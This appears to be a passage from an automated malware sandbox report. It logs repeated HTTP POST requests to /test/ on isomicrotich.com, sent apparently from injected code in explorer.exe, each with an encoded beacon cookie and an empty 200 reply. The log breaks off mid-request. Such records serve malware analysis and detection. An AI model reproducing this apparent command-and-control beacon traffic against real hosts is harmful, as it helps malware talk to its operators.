                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mla5Lno219m9XgbQ%2FexwnL4JiI4K7KPf4WPUmX%2ForaK7UuQvQAkGEFAc2fo4npEpULDure6gtag7h4AT6tiN0UehXYYBtz%2ByxmdIbFTIYAiVtoz8PX0nzs50adnSonGIq67v"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19271eca41ad-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                30192.168.2.762310188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:01 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:02 UTC565INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:02 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KcJs%2BB33SimoMmUkVU0lfynnUbSNkMyOWtuysAB%2F6K3uc0v5ywRXjH5izibXtPoNF66uFZhuzo7ebBFyiXgfW1UmAPmoJt7VDBGc0V%2BeSTWnpNhwXK3dWjBS5YqTfKrto5Gn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf192d0ed40f79-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                31192.168.2.762313188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:03 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:03 UTC550INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:03 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kk3vr%2BH090EhxCvRPAm0RSrlpYT1Z74dNMPz9UepCraFCK%2BavHymcHr72%2Bk%2FqVKZzbsqwbnEIhIF%2FPeD9uQeqrMfOpLm5XtbQZbx%2BlrLEv8Ia7R1anv%2BHX7DLilM33C8tAKQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19361b974405-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                32192.168.2.762314188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:04 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:04 UTC567INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:04 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cI%2FSQTzb5DC0rioZ3K05%2Fl9jmOkANRLP3gl3pK2cQw24yv9q8xK5CjG6fbUYMXdbUSce5E95KSJKjjSskByjEMYQlX7tvLawBBgcM9C85lKl%2FnZevZ5jNYjuAhC%2F2FbdmKLW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf193d4dab4386-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                33192.168.2.762315188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:05 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:06 UTC548INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:06 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SFIsRDZVAYgnj89Y2%2Bgdz2u1TMDgUhc932l8ymKk30qiXNkvLhfvZTH%2Fg90fbSOd4kOEfFqtmmQPA%2F%2FrHCm9%2FjrvXG5q3Yh7T5JkjKC3xE98lk0%2Fh6O5O3TxnFUkfAE2XPzk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19450ece42af-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                34192.168.2.762318188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:07 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:07 UTC565INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:07 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uEswb6VaIjZO%2FjdBFKM45lq0fkgwLfyjunSaiLSrvdDrV0YgrEVS36W7SnTnL7EZ2zJ6R50TEgtESsvmZ%2Fo6Sg3bAvaRy0VT0cj6oon60HHmXNp57BhuPhBdgi6fCE%2FPvst8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf194ebeca8c2f-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                35192.168.2.762320188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:08 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:08 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:08 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bVd38BqjR4cZYrcXtWOjGQaBennIQ48d5w5U%2Fhrgywuto7WkXIkTG7o28Edmg3UdSI%2Fh7lWx9Sgwf7CdrR1pGdMx%2FGahc1Bn2md9wJ1NfdM%2FItT7D7rWQj1705xKI%2BPqwFQa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19564ab8423e-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                36192.168.2.762321188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:10 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:11 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:11 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9f60N3zcWhnIUCoUprNpQKvU65tKImF5I%2FTZNHQcxcLPvejLmcQHoeO7JbGddrjOAzfmlRqkhuIUVzoFNpjAh9KIwy%2FwbRDddg0PGImQrWpRfAtcn%2F9xWr%2FToC3Z4yhK%2B1jV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19693cac8c11-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                37192.168.2.762323188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:12 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:13 UTC571INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:12 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iT%2BWdnLvAlGl5y7cQR%2Bw6V9OlVeoFbAO1uP9jL19rojGG33odGjivKblAWD9%2BXrQXlA6toFlHFHW6L9%2BDPN3T2fAWORANrxSvSwaw8%2BnlSdkckQoCzRHgnG3NmSIz2LNF66%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19700bf2de96-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                38192.168.2.762326188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:13 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:14 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:14 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VKgDQigfEtDNo2Cotaa1zISGHgUyQCXLEFbd%2F2e2pIl4plaqv2HwPIniDw62PJxtTsFCRZeG6Z%2FAR5VhH0F%2BTjmhCuSqnhrDz6mVWjsv2pAwwuUcGnVAndBFGW6R9s1LFekf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf197759487d26-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                39192.168.2.762329188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:15 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:15 UTC571INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:15 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=klo2TpBf39Ygs90u5hztw%2F4ws6LNrCwIw8fs%2FYr7vYkG7LRzHWA3ysmWaD%2F4M36RrGojNFuY3g%2BC2rwZ4MhK4bBhO81OLjZNvAPq4nYTR%2FeX%2F8CvBxgOF5JckjTSXJkt7Ulb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19823d8b728f-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                40192.168.2.762331188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:16 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:16 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:16 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6QgVuQ4rPt6Cfctan3gf0TK02RCNIkfmZ%2Fj2DTSHKDk9MXNno2qk3JMqWn05fZ5iaIZ4hVl%2F6lkbIcvUqJlfoJ4UyeIy0S5SDQ0bRL0Uqx9CYJ3Lhb0Vu3n49SmycsyUZDzF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1988db8cde92-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                41192.168.2.762332188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:17 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:18 UTC544INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:18 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8dZmvih%2BzuV7JILnT3OyyrOZOIgB5vdUT6Rt3bGLjuK%2BPL%2Fd2EyjfFYkKI2oDG%2Bc38iyQTSfoSvnX5f3ZEiHCCxRoMsy5cVoQuBZnAs6oQlho07PN7ZBl0spZLYI4g9gMGZH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19920c7219f3-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                42192.168.2.762334188.114.97.34434056C:\Windows\explorer.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:19 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
